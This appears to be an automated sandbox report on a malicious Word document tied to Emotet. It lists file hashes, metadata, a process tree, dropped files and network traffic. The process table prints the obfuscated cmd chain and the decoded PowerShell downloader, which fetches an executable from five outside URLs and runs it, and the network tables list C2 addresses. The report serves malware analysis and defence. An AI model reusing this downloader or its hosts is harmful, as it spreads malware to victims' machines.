File name: | 3MDMvf_bDiRwT_2R5RoJCmJ |
Full analysis: | https://app.any.run/tasks/7349f3d3-7a55-4d22-83d1-67624d572651 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into very destructive malware. It mostly targets corporate victims, but private users also get infected through mass spam email campaigns. |
Analysis date: | December 18, 2018, 19:17:14 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 18 17:28:00 2018, Last Saved Time/Date: Tue Dec 18 17:28:00 2018, Number of Pages: 1, Number of Words: 5, Number of Characters: 33, Security: 0 |
MD5: | 7D72FDAF73CC6FAF684D1A98B82A12E8 |
SHA1: | 1A6048F4FC12A920ED1867AF623B408F39089B5B |
SHA256: | B4CE02C00705126F8AE6071A41EA8AE6EADA62D3052A8D4E850A142BAACCFE64 |
SSDEEP: | 3072:g0nbUh0eeTswVj8GhDS0o9zTGOZD6EbzCdyyjNmXZI:XRoUOZDlbeyyj4XZI |
.doc | | | Microsoft Word document (54.2) |
---|---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:18 17:28:00 |
ModifyDate: | 2018:12:18 17:28:00 |
Pages: | 1 |
Words: | 5 |
Characters: | 33 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 37 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: | |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3496 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\3MDMvf_bDiRwT_2R5RoJCmJ.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2824 | c:\o7555563226081\t2569490548\D569888924\..\..\..\windows\system32\cmd.exe /c %pROgRAMData:~0,1%%PRoGrAmDAta:~9,2% /v:o /c " SeT wo=;'640d'=689t$}}{hctac}};kaerb;'181Z'=140w$;135M$ metI-ekovnI{ )00008 eg- htgnel.)135M$ metI-teG(( fI;'189C'=952V$;)135M$ ,574M$(eliFdaolnwoD.842V${yrt{)310s$ ni 574M$(hcaerof;'exe.'+381F$+'\'+pmet:vne$=135M$;'577U'=004f$;'884' = 381F$;'929X'=302Q$;)'@'(tilpS.'CH43_kOq/eg.ytre-labolg.www//:ptth@ipAYvqb_I5GWNKHW/moc.cjotutitsni.www//:ptth@R9nsKFn_pKyIYFdi/ua.moc.htlaeherocne.www//:ptth@plXkk_N0iP9A/moc.gnihgnuhcgnok.www//:ptth@0rdDd1sNp_GrUVnB/moc.esikram-egitrewhcoh.www//:ptth'=310s$;tneilCbeW.teN tcejbo-wen=842V$;'745I'=300z$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop&& For /l %A iN ( 582 -1 0) Do SeT WwRT=!WwRT!!wo:~ %A, 1!&&iF %A == 0 eCHO !WwRT:~6! | CM%os:~-7,-6% " | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
768 | CmD /v:o /c " SeT wo=;'640d'=689t$}}{hctac}};kaerb;'181Z'=140w$;135M$ metI-ekovnI{ )00008 eg- htgnel.)135M$ metI-teG(( fI;'189C'=952V$;)135M$ ,574M$(eliFdaolnwoD.842V${yrt{)310s$ ni 574M$(hcaerof;'exe.'+381F$+'\'+pmet:vne$=135M$;'577U'=004f$;'884' = 381F$;'929X'=302Q$;)'@'(tilpS.'CH43_kOq/eg.ytre-labolg.www//:ptth@ipAYvqb_I5GWNKHW/moc.cjotutitsni.www//:ptth@R9nsKFn_pKyIYFdi/ua.moc.htlaeherocne.www//:ptth@plXkk_N0iP9A/moc.gnihgnuhcgnok.www//:ptth@0rdDd1sNp_GrUVnB/moc.esikram-egitrewhcoh.www//:ptth'=310s$;tneilCbeW.teN tcejbo-wen=842V$;'745I'=300z$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop&& For /l %A iN ( 582 -1 0) Do SeT WwRT=!WwRT!!wo:~ %A, 1!&&iF %A == 0 eCHO !WwRT:~6! | CMd " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3480 | C:\Windows\system32\cmd.exe /S /D /c" eCHO pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $z003='I547';$V248=new-object Net.WebClient;$s013='http://www.hochwertige-markise.com/BnVUrG_pNs1dDdr0@http://www.kongchunghing.com/A9Pi0N_kkXlp@http://www.encorehealth.com.au/idFYIyKp_nFKsn9R@http://www.institutojc.com/WHKNWG5I_bqvYApi@http://www.global-erty.ge/qOk_34HC'.Split('@');$Q203='X929';$F183 = '488';$f400='U775';$M531=$env:temp+'\'+$F183+'.exe';foreach($M475 in $s013){try{$V248.DownloadFile($M475, $M531);$V259='C981';If ((Get-Item $M531).length -ge 80000) {Invoke-Item $M531;$w041='Z181';break;}}catch{}}$t986='d046'; " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3576 | CMd | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3984 | powershell $z003='I547';$V248=new-object Net.WebClient;$s013='http://www.hochwertige-markise.com/BnVUrG_pNs1dDdr0@http://www.kongchunghing.com/A9Pi0N_kkXlp@http://www.encorehealth.com.au/idFYIyKp_nFKsn9R@http://www.institutojc.com/WHKNWG5I_bqvYApi@http://www.global-erty.ge/qOk_34HC'.Split('@');$Q203='X929';$F183 = '488';$f400='U775';$M531=$env:temp+'\'+$F183+'.exe';foreach($M475 in $s013){try{$V248.DownloadFile($M475, $M531);$V259='C981';If ((Get-Item $M531).length -ge 80000) {Invoke-Item $M531;$w041='Z181';break;}}catch{}}$t986='d046'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2916 | "C:\Users\admin\AppData\Local\Temp\488.exe" | C:\Users\admin\AppData\Local\Temp\488.exe | — | powershell.exe |
User: admin Company: Microsoft Corporati Integrity Level: MEDIUM Description: Thai Pattachote (non-ShiftLock) Keyboa Exit code: 0 | ||||
3720 | "C:\Users\admin\AppData\Local\Temp\488.exe" | C:\Users\admin\AppData\Local\Temp\488.exe | | 488.exe |
User: admin Company: Microsoft Corporati Integrity Level: MEDIUM Description: Thai Pattachote (non-ShiftLock) Keyboa Exit code: 0 | ||||
3296 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 488.exe |
User: admin Company: Microsoft Corporati Integrity Level: MEDIUM Description: Thai Pattachote (non-ShiftLock) Keyboa Exit code: 0 | ||||
3824 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | | archivesymbol.exe |
User: admin Company: Microsoft Corporati Integrity Level: MEDIUM Description: Thai Pattachote (non-ShiftLock) Keyboa |
PID | Process | Filename | Type | |
---|---|---|---|---|
3496 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA905.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3496 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\473B877B.wmf | — | |
MD5:— | SHA256:— | |||
3496 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1AFE0A41.wmf | — | |
MD5:— | SHA256:— | |||
3984 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZOS7PYW8MU8KFYO8P1RB.temp | — | |
MD5:— | SHA256:— | |||
3496 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$DMvf_bDiRwT_2R5RoJCmJ.doc | pgc | |
MD5:C81A5B5ED0215F9F56154774D4AFF38B | SHA256:9DE184C1E6ECC4B053FF1403733CA005CAA6E33D2E61ED8948730B0C0057574F | |||
3984 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13ba0c.TMP | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA | |||
3984 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA | |||
3496 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DE2130E2.wmf | wmf | |
MD5:1902BD1D0EE1D11C4CB92A8F96D6CDD7 | SHA256:577E19431A68CA3B4CBB0847822583285AEED4926C464E2ACAA44402317F37AD | |||
3496 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9103E340.wmf | wmf | |
MD5:D36786E54DFD5D7DA2F0B2DAC4F23407 | SHA256:E7D7FC6DC91230F6891F180C85C3649B5E8A4E7F274CDBADB8F50B3EE781C808 | |||
3496 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:6B4C003919922D3150FBE69ED05CA2BE | SHA256:6BFE33061E0B5ECA522C7484AE73A63509061FFF9A26239C67806D92C50013FB |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3824 | archivesymbol.exe | GET | — | 217.173.64.242:443 | http://217.173.64.242:443/ | RU | — | — | suspicious |
3984 | powershell.exe | GET | 200 | 85.93.24.120:80 | http://www.hochwertige-markise.com/BnVUrG_pNs1dDdr0/ | DE | executable | 124 Kb | suspicious |
3984 | powershell.exe | GET | 301 | 85.93.24.120:80 | http://www.hochwertige-markise.com/BnVUrG_pNs1dDdr0 | DE | html | 260 b | suspicious |
3824 | archivesymbol.exe | GET | 200 | 181.48.61.138:20 | http://181.48.61.138:20/ | CO | binary | 132 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3824 | archivesymbol.exe | 217.173.64.242:443 | — | OOO WestCall Ltd. | RU | suspicious |
3824 | archivesymbol.exe | 181.48.61.138:20 | — | Telmex Colombia S.A. | CO | malicious |
3984 | powershell.exe | 85.93.24.120:80 | www.hochwertige-markise.com | GHOSTnet GmbH | DE | suspicious |
Domain | IP | Reputation |
---|---|---|
www.hochwertige-markise.com | | suspicious |
PID | Process | Class | Message |
---|---|---|---|
3984 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3984 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3984 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3824 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3824 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3824 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3824 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |